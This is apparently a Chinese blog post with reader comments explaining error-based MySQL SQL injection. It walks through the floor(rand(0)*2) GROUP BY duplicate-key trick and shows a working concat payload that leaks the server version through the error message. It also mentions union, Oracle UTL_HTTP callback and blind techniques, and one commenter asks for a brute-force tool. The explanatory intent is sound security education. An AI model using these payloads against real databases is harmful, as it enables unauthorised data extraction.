SQL注射取数据的方式有多种:
- 利用union select查询直接在页面上返回数据,这种最为常见,一个前提是攻击者能够构造闭合的查询。
- Oracle中利用监听UTL_HTTP.request发起的HTTP请求,把QuerySet反弹回攻击者的主机。当然,HTTP服务器对URL的长度有一定限制,因此每次可返回的数据量不可过多。
- 基于错误消息取数据,前提是页面能够响应详细的错误描述。它的一个优点是,我们可能不必太费力去猜测和闭合SQL(可以构造子查询,让MySQL在子查询中报错)。
- 盲注,页面不会显示错误消息。常见基于布尔的盲注、基于时间的盲注,此类注射点利用价值相对要低一点,猜解数据的时间较长。
本篇简单说明非常经典的基于错误回显的MySQL注射。最重要的,就是理解下面的SQL查询:
select count(*),floor(rand(0)*2)x from information_schema.character_sets group by x;
上面的这条SQL将报错: Duplicate entry ‘1’ for key ‘group_key’
如下图
1. 为什么MySQL注射要用information_schema库?
答案是这个库是MySQL自带的,安装之后就创建好了,所有账号都有权限访问。攻击者无需猜解库名、表名。跟Oracle注射使用dual类似。
2. 如何利用报错取数据?
利用报错,攻击者把目标数据concat连接到floor()函数的前后即可。
例如,下面的语句用于获取MySQL Server版本,构造:
mysql> select count(*),concat( floor(rand(0)*2), 0x5e5e5e, version(), 0x5e5e5e) x from information_schema.character_sets
group by x;
ERROR 1062 (23000): Duplicate entry ‘1^^^5.5.28^^^’ for key ‘group_key’
通过报错,即可知道当前数据库是5.5.28。0x5e5e5e是3个尖括号的16进制表示。 自动化SQL注射工具通常会在目标数据前后做类似的标记,方便程序提取。
加上标记,也可以方便攻击者在大的页面中搜索。
3. 为何这条语句会报错?
rand(0)是把0作为生成随机数的种子。首先明确一点,无论查询多少次,无论在哪台MySQL Server上查询,连续rand(0)生成的序列是固定的。
mysql> select rand(0)*2 x from information_schema.character_sets; +---------------------+ | x | +---------------------+ | 0.3104408553898715 | | 1.241763483026776 | | 1.2774949104315554 | | 0.6621841645447389 | | 1.4784361528963188 | | 1.4056283323146668 | | 0.5928332643516672 | | 0.7472813862816258 | | 1.9579071998204172 | | 1.5476919017244986 | | 1.8647379706285316 | | 0.6806142094364522 | | 1.8088571967639562 | | 1.002443416977714 | | 1.5856455560639924 | | 0.9208975908541098 | | 1.8475513475458616 | | 0.4750640266342685 | | 0.8326661520010477 | | 0.7381387415697228 | | 1.192695313312761 | | 1.749060403321926 | | 1.167216138138637 | | 0.5888995421946975 | | 1.4428493580248667 | | 1.4475482250075304 | | 0.9091931124303426 | | 0.20332094859641134 | | 0.28902546715831895 | | 0.8351645514696506 | | 1.3087464173405863 | | 0.03823849376126984 | | 0.2649532782518801 | | 1.210050971442881 | | 1.2553950839260548 | | 0.6468225667689206 | | 1.4679276435337287 | | 1.3991705788291717 | | 0.5920700250119623 | +---------------------+
应用floor函数(取浮点数的整数部分)后,结果变成了:
mysql> select floor(rand(0)*2) x from information_schema.character_sets; +---+ | x | +---+ | 0 | | 1 | | 1 | | 0 | | 1 | | 1 | | 0 | | 0 | | 1 | | 1 | | 1 | | 0 | | 1 | | 1 | | 1 | | 0 | | 1 | | 0 | | 0 | | 0 | | 1 | | 1 | | 1 | | 0 | | 1 | | 1 | | 0 | | 0 | | 0 | | 0 | | 1 | | 0 | | 0 | | 1 | | 1 | | 0 | | 1 | | 1 | | 0 | +---+ 39 rows in set (0.00 sec)
可以看到,第二行和第三行的值都是1。这也是最终引起MySQL报错Duplicate entry的地方。
实际上,我们分开执行下面的两种查询,都是不会出错的:
a) select floor(rand(0)*2) x from information_schema.character_sets group by x;
上面的查询根据x列的值进行分组,得到:
+---+ | x | +---+ | 0 | | 1 | +---+
b) select count(*), floor(rand(0)*2) x from information_schema.character_sets;
得到information_schema.character_sets总共有39行:
+----------+---+ | count(*) | x | +----------+---+ | 39 | 0 | +----------+---+ 1 row in set (0.00 sec)
请注意,这里x的值出现的是0。
c) 将上述语句结合后即报错
select count(*), floor(rand(0)*2) x from information_schema.character_sets group by x;
我们预期的结果, 其实是:
+----------+---+ | count(*) | x | +----------+---+ | 18 | 0 | +----------+---+ | 11 | 1 | +----------+---+ 2 row in set (0.00 sec)
然而MySQL在内部处理中间结果的时候,出现了意外,导致报错。
玩的太高端,已经完全看不懂了~~~~
折腾点自己喜欢的,你平日也多玩点有意思的东西。
mark以后今天看看~
小松路过顶一下
感谢小木公呐,哈哈。 好久不见了。
楼主求爆破工具
大师兄,我也是西北工业的 有没有查到为啥他会出错啊 最奇怪的是 select count(*), floor(rand()*2) x from information_schema.character_sets group by x;这句只有一定的几率会出错。
rand()函数要加上初始种子,其值才是固定的。你的语句里面”rand()*2″应改为”rand(0)*2″,就会稳定报错
谢谢分享
一直对error based injection难以理解,这么多文章里,感觉你的讲的最好!路过支持一下
思路清晰,混个脸熟…哈哈